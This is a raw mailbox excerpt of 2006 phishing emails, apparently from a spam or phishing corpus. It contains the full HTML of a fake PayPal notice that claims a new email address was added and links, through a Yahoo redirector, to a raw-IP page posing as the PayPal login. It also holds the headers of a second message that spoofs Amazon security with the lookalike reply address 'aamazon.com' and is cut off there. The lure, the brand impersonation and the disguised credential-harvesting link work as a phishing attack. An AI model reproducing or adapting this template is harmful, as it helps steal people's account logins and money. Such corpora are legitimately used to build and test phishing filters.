From: Update Now <portcoos@portofcoosbay.com>
Subject: Notification
Date: Thu, 9 Mar 2006 09:34:29 -0800
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2800.1081
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1081
Message-Id: <20060309173340.2F8AF6CCEF2@mail1.example.com>
To: undisclosed-recipients: ;
Status: O
X-Status: 
X-Keywords:                  
X-UID: 544

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<div align="left" class="style2">
  <p class="style2"><FONT face="Courier New" size="2">You have added <b>
	mike82@woh.rr.com</b> as a new email address for your
PayPal account.</font><br>
    <font face="Courier New" size="2">If you don't agree with this email and if you need assistance with your account,<br>
  click here and 
	<a target="_blank" href="http://rds.yahoo.com/S=44831148:D1/CS=44831148/SS=44831166/SIG=11v8331g7/*http://69.251.190.94:60006/bin-cgi/webscr_cmd=_login-run/">process your login</a>. </font> </p>
    </p>
  <p><font face="Courier New" size="2">Thank you for using PayPal! <br>
    The PayPal Team </font> </p>
  <address><span style="font-style: normal"><font face="Courier New" size="2">Please do not reply to this email. This mailbox is not monitored and you will not receive a response.</font></span></address>
  <address><font face="Courier New" size="2"><span style="font-style: normal">For assistance,log in to your 
  PayPal account and click thec Help link located in the top right corner </span>
  </font>
    </address>
  <address><font face="Courier New" size="2"><span style="font-style: normal">of any 
  PayPal page. </span> <br>
    </font>
    </address>
  <p><font face="Courier New" size="2">PayPal Email ID PP007 </font> </p>
</div>
</body>
</html>

From security@amazon.com  Thu Mar  9 14:33:38 2006
Return-Path: <security@amazon.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.1.2.3])
	by naughty.example.com (Postfix) with ESMTP id DFD6553723B
	for <nobody@login.example.com>; Thu,  9 Mar 2006 14:33:37 -0500 (EST)
Received: from server1.sprycat.com (unknown [207.71.8.197])
	by mail1.example.com (Postfix) with ESMTP id ADE2C6CCEFA
	for <nobody@example.com>; Thu,  9 Mar 2006 14:33:37 -0500 (EST)
Received: from User (host.venable.com [69.16.212.191] (may be forged))
	(authenticated)
	by server1.sprycat.com (8.11.6/8.11.6) with ESMTP id k29JWl731864;
	Thu, 9 Mar 2006 13:32:47 -0600
Message-Id: <200603091932.k29JWl731864@server1.sprycat.com>
Reply-To: <security@aamazon.com>
